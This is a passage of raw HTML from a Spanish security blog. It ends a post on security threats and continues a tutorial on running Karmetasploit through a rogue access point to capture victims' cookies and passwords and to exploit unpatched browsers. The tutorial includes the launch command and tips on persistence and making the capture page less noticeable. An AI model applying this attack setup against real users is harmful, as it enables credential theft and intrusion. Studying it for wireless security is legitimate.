que aunque su motivación sea la curiosidad también pueden provocar incidentes de seguridad.</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Competencia poco ética(ej. espionaje industrial para robar secretos empresariales, listas de clientes, etc) o potencias extranjeras con objetivos comerciales o secretos de estado y que utilizan el espionaje, ingeniería social, "phishing", "malware" o todo tipo de técnicas de "pen-testing" para lograrlo.</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Empleados no cualificados que provocan que errores humanos de forma inocente, otros descontentos que utilizan mal o desconfiguran los sistemas de seguridad y los que ignoran las políticas de seguridad y las buenas prácticas.</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Boicoteadores que destruyen, o tratan de destruir, activos de información o que prohíben el acceso a los mismos(un tipo de extorsión).</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Acceso no autorizado, modificación o divulgación de activos de información ya sean hardware, software o datos.</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Países altamente cualificados técnicamente en materias de seguridad pueden utilizar la información de la que disponen durante una guerra para atacar las infraestructuras donde reside la información más crítica del oponente.</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Avances tecnológicos. Un ejemplo es la computación atómica, con su llegada es solo cuestión de tiempo que todos los algoritmos de encriptado actuales se queden obsoletos.</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">En la siguiente entrada sobre este tema seguiré con las vulnerabilidades e impactos.</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br />Nota: Esta entrada tiene licencia</span></span><a href="http://creativecommons.org/licenses/by-nc-sa/3.0/"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> Attribution-Noncommercial-Share Alike 3.0 Unported</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> para respetar la del texto original.</span></span></div><div style="text-align: right;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /><br />Jesús Pérez</span></span></div></div></div></div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7743819158194184549-1708752373179999747?l=nicerosniunos.blogspot.com' alt='' /></div>Jesús Pérezhttp://www.blogger.com/profile/09565740223441207640noreply@blogger.com0tag:blogger.com,1999:blog-7743819158194184549.post-56551991571807985652010-04-08T18:07:00.174+02:002012-02-11T18:46:11.074+01:00Karmetasploit en Backtrack (II)<div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span><br /><div style="text-align: left;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">En el </span></span><a href="http://nicerosniunos.blogspot.com/2010/04/punto-de-acceso-falso-ii-karmetasploit.html"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">artículo anterior</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> configuré el entorno necesario para montar el punto de acceso ficticio y dar acceso a las víctimas a Internet, ahora paso a la segunda parte de este ataque que es lanzar el Karmetasploit. Antes de nada, como necesita una base de datos, la forma más sencilla de configurarlo(según sus cradores): </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">gem install activerecord sqlite3-ruby. </span></span><span class="Apple-style-span" style="font-style: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Ahora arranco </span></span></span><span class="Apple-style-span" style="font-style: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Metasploit</span></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span><span class="Apple-style-span" style="font-style: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">con el script</span></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span><i><a href="http://metasploit.com/users/hdm/tools/karma.rc"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">karma.rc</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">:</span></span></i></i></span></div><div style="margin: 0px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><i><i><i><i><i><i><i><i><i><i><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><b></b></span></span></i></i></i></i></i></i></i></i></i></i></i><i><i><i><i><i><i><i><i><i><i><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><b></b></span></span></i></i></i></i></i></i></i></i></i></i></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><i><i><i><i><i><i><i><i><i><i><i><b></b></i></i></i></i></i></i></i></i></i></i></i></span><br /><div class="separator" style="clear: both; display: inline ! important; font-family: 'Times New Roman'; font-weight: normal; margin: 0px; text-align: left;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><i><i><i><i><i><i><i><i><i><i><i><b><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">iptables -t nat -A PREROUTING -i at0 -j REDIRECT & msfconsole -r karma.rc >> captureKarma.txt</span></span></i></b></i></i></i></i></i></i></i></i></i></i></i></span></div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><i><i><i><i><i><i><i><i><i><i><i><b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-style: normal; font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></b></i></i></i></i></i></i></i></i></i></i></i></span></div><div style="margin: 0px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><i><i><i><i><i><i><i><i><i><i><i><b><i><i><i><i><i><i><i><i><i><i><b></b></i></i></i></i></i></i></i></i></i></i></b></i></i></i></i></i></i></i></i></i></i></i></span><br /><div class="separator" style="clear: both; display: inline ! important; font-family: 'Times New Roman'; font-weight: normal; margin: 0px; text-align: left;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><i><i><i><i><i><i><i><i><i><i><i><b><i><i><i><i><i><i><i><i><i><i><b><i><span class="Apple-style-span" style="font-style: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- El primero es necesario porque en la </span></span></span><span class="Apple-style-span" style="font-style: normal;"><a href="http://www.metasploit.com/redmine/projects/framework/wiki/Karmetasploit"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">página del proyecto</span></span></a></span><span class="Apple-style-span" style="font-style: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> aconsejan forzar que siempre atienda el punto de acceso las peticiones DNS y el cliente no use las que tiene cacheadas.</span></span></span></i></b></i></i></i></i></i></i></i></i></i></i></b></i></i></i></i></i></i></i></i></i></i></i></span></div></div><div style="margin: 0px;"><div style="margin: 0px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Al arrancar </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">msfconsole</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> hay un error al principio porque dice que el plugin de</span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">db_sqlite3</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> está </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">deprecated</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">, hay que eliminar la primera línea de </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">karma.rc</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> ya que ahora (con Backtrack y Metasploit actualizados) lo carga directamente al iniciar el framework, de hecho vemos que crea la base de datos </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">karma.db</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> a pesar del error. Pero después de un buen rato rompiéndome la cabeza mi conclusión es que no funciona bien ya que solo almacena una cookie y una petición(las últimas) aunque la estructura de datos es correcta, incluso reconoce el sistema operativo del cliente (en la tabla </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">hosts</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">). Sería interesante solucionarlo instalando otra base de datos como MySQL que también tiene plugin para este script. A continuación se muestran unos pantallazos del </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">sqlitebrowser</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> al acabar esta prueba donde vemos este problema:</span></span></span></div><div style="margin: 0px;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div></div><div style="margin: 0px;"><div style="margin: 0px;"><div class="separator" style="clear: both; margin: 0px; text-align: center;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: black;"></span></span></span></span></div><div style="text-align: left;"><div style="text-align: center;"><div class="separator" style="clear: both; text-align: center;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><a href="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/S74fzTVud8I/AAAAAAAAAG8/YFNYX53EI4Q/s1600/imagen.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><img border="0" height="110" src="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/S74fzTVud8I/AAAAAAAAAG8/YFNYX53EI4Q/s320/imagen.png" width="320" /></span></span></a></span></div></div></div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">La tabla interesante es </span></span><span class="Apple-style-span" style="color: black;"><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">notes</span></span></i></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">, donde guarda las cookies y las contraseñas, en este caso solo hay una(de Facebook), cuando tendría que haber conseguido otras dos más como vemos en el pantallazo de la víctima:</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></span></div><div style="text-align: center;"><div class="separator" style="clear: both; margin: 0px; text-align: center;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><a href="http://3.bp.blogspot.com/_2sYHpwLKJ8Y/S74bv6_7_PI/AAAAAAAAAGk/4ev7f9LXS5k/s1600/imagen.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><img border="0" src="http://3.bp.blogspot.com/_2sYHpwLKJ8Y/S74bv6_7_PI/AAAAAAAAAGk/4ev7f9LXS5k/s200/imagen.png" style="height: 187px; width: 230px;" /></span></span></a><a href="http://2.bp.blogspot.com/_2sYHpwLKJ8Y/S74aB4eGl6I/AAAAAAAAAGc/UTlEAMR2GOs/s1600/imagen.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><img border="0" src="http://2.bp.blogspot.com/_2sYHpwLKJ8Y/S74aB4eGl6I/AAAAAAAAAGc/UTlEAMR2GOs/s200/imagen.png" style="height: 185px; width: 171px;" /></span></span></a></span></div></div><div class="separator" style="clear: both; text-align: left;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div><div class="separator" style="clear: both; text-align: center;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><b></b></span></span></span></div></div></div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><div style="display: inline ! important; text-align: left;"><span class="Apple-style-span" style="font-weight: normal;"><b><b><b></b></b></b></span><br /><div class="separator" style="clear: both; display: inline ! important; margin: 0px; text-align: left;"></div><div><span class="Apple-style-span" style="font-weight: normal;"><b><b><b><b><b></b></b></b></b></b></span><br /><div style="display: inline ! important; text-align: left;"><span class="Apple-style-span" style="font-weight: normal;"><b><b><b><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><b></b></b></b></span></b></b></b></b></b></span><br /><div class="separator" style="clear: both; display: inline ! important; margin: 0px; text-align: left;"><span class="Apple-style-span" style="font-weight: normal;"><b><b><b><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><b><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Debido al problema anterior redirijo toda la salida a un archivo de texto para poder examinarlo con calma más adelante.</span></span></span></b></b></b></span></b></b></b></b></b></span></b></b></b></b></b></span></div></div></div><span class="Apple-style-span" style="font-weight: normal;"><b><b><b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br />¿Qué pasa al arrancar Kametasploit?</span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> Todas sus funcionalidades las encontramos en </span></span><a href="http://pentestit.com/2010/01/17/karmetasploit-tool-build-wireless-hotspot-sniffer/"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">esta entrada de PenTestIT</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">, pero en esta prueba(debido al software que se utiliza el cliente) podemos resumirlo en lo siguiente:</span></span></span></b></b></b></span><br /></div></b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><div style="text-align: left;"></div><b><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><b></b><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important;"><div style="display: inline ! important;"><div style="display: inline ! important;"><div style="display: inline ! important;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></b></div></div></div></div></div></div></div></div></div></div></b></span></b></b></span></b></b></span></b></b></span></b></b></b></span></b></b></b></b><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><span class="Apple-style-span" style="font-weight: normal;"><b></b></span></b></b></span></b></b></span></b></b></span></b></b></b></span></b></b></b></b></span></span><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b></b></b></span></b></b></span></b></b></span></b></b></span></b></b></b></span></b></b></b></b></span></span><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important;"><div style="display: inline ! important;"><div style="display: inline ! important;"><div style="display: inline ! important;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><b><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Crea multitud de servidores </span></span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">e intenta explotar alguna vulnerabilidad en el cliente, si todo va bien(el software de la víctima no esta actualizado) conseguirá él solo una sesión de </span></span></span><a href="http://www.metasploit-es.com.ar/wiki/index.php/Meterpreter"><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Meterpreter</span></span></span></a><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> para poder jugar con ella :P. Pero en nuestro caso tenemos un Windows 7 actualizado así que no es el caso, el siguiente vídeo muestra un ejemplo de uso contra un XP vulnerable:</span></span></span></b></b></span></b></b></span></b></b></span></b></b></span></b></b></b></span></b></b></b></b></span></span></div></div></div></div></div></div></div></div></div></div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><div style="text-align: center;"><span class="Apple-style-span" style="font-weight: normal;"><b><b><b></b></b></b></span><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><span class="Apple-style-span" style="font-weight: normal;"><b><b><b><b></b></b></b></b></span><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important;"><div style="display: inline ! important;"><div style="display: inline ! important;"><span class="Apple-style-span" style="font-weight: normal;"><b><b><b><b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></b></b></b></b></span><br /><span class="Apple-style-span" style="font-weight: normal;"><b><b><b><b><object height="340" width="560"><param name="movie" value="http://www.youtube.com/v/Ne7hof-w0kU&hl=es_ES&fs=1&rel=0"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/Ne7hof-w0kU&hl=es_ES&fs=1&rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" height="340" width="560"></embed></object></b></b></b></b></span><br /><span class="Apple-style-span" style="font-weight: normal;"><b><b><b><b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></b></b></b></b></span></div></div></div></div></div></div></div></div></div></div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><b></b></span></span><span class="Apple-style-span" style="font-weight: normal;"><b><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><b></b><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Al obtener una sesión podrían aplicarse distintas técnicas como por ejemplo activar el escritorio remoto de la víctima y crear un usuario administrador </span></span></span><a href="http://www.forohack.com/index2.php?Ver=Mensaje&Id=6401&WebOrigen=1"><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">usando el script </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">getgui</span></span></i></span></a><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">.</span></span></span></b></div></div></div></div></div></div></div></b></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b></b><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><b></b></b><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important;"><b><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Se conecta a sitios comunes (Gmail, Facebook, Twitter...) para obtener cookies almacenadas en el navegador del cliente. Como dije antes almacené la salida en</span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">captureKarma.txt</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">, a falta de base de datos corto y pego las partes interesantes:</span></span></span></b></b></div></div></div></div></div></div></div></div><div style="margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"></span></span><br /><div style="display: inline ! important;"></div></div></div></div></div></div></div><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span><br /><div style="text-align: center;"><span class="Apple-style-span" style="font-weight: normal;"><b></b></span><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important;"><span class="Apple-style-span" style="font-weight: normal;"><b><span class="Apple-style-span" style="font-weight: normal;"><b></b></span></b></span><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><span class="Apple-style-span" style="font-weight: normal;"><b><span class="Apple-style-span" style="font-weight: normal;"><b><span class="Apple-style-span" style="font-weight: normal;"><b></b></span></b></span></b></span><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div class="separator" style="clear: both; display: inline ! important; text-align: center;"><span class="Apple-style-span" style="font-weight: normal;"><b><span class="Apple-style-span" style="font-weight: normal;"><b><span class="Apple-style-span" style="font-weight: normal;"><b><a href="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/S74euIJn2iI/AAAAAAAAAG0/XPvZInTZlHo/s1600/imagen.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><img border="0" height="220" src="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/S74euIJn2iI/AAAAAAAAAG0/XPvZInTZlHo/s320/imagen.png" width="320" /></span></span></a></b></span></b></span></b></span></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><div class="separator" style="clear: both; text-align: center;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><b></b></span></span><b></b><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><b><b></b></b><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><b><b><b></b></b></b><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><b><b><b><b></b></b></b></b><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><b><b><b><b><b></b></b></b></b></b><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; text-align: center;"><b><b><b><b><b><span class="Apple-style-span" style="font-weight: normal;"><b></b></span></b></b></b></b></b><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><b><b><b><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b></b></b></span></b></b></b></b></b><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><b><b><b><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><b></b></b></b></span></b></b></b></b></b><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><b><b><b><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><b><b></b></b></b></b></span></b></b></b></b></b><br /><div class="separator" style="clear: both; display: inline ! important; font-family: 'Times New Roman'; font-weight: normal; margin: 0px; text-align: left;"><b><b><b><b><b><span class="Apple-style-span" style="font-weight: normal;"><b><b><b><b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Me falta comentar que en cuanto empezamos con esta parte del ataque en el navegador de la víctima deja de navegar y aparece lo que se ve en la imagen. Se podría modificar simplemente por una web en blanco para que fuese menos "cantoso" (ruta: </span></span><i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">/opt/metasploit3/msf3/data/exploits/capture/http/index.html</span></span></i><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">).</span></span></b></b></b></b></span></b></b></b></b></b></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div><div style="margin: 0px;"><span class="Apple-style-span" style="font-size: small;"></span><b></b><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b></b></span></span></b><br /><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><div style="display: inline ! important; margin: 0px;"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-weight: normal;"><br /></span></span></span></b></span></span></b><br /><div style="text-align: center;"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Times New Roman';"><b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: Georgia, serif; font-weight: normal;"><a href="http://2.bp.blogspot.com/_2sYHpwLKJ8Y/S8SLZ3qUYfI/AAAAAAAAAHM/YmiKTOcUy-U/s1600/imagen.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5459641924834320882" src="http://2.bp.blogspot.com/_2sYHpwLKJ8Y/S8SLZ3qUYfI/AAAAAAAAAHM/YmiKTOcUy-U/s200/imagen.png" style="cursor: pointer; display: block; height: 166px; margin: 0px auto 10px; text-align: center; width: 200px;" /></a></span></span></b></span></span></b></div></div></div></div></div></div></div></div></div></div></b></span></span></div></span></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span><br /><div><span class="Apple-style-span" style="font-family: Verdana, 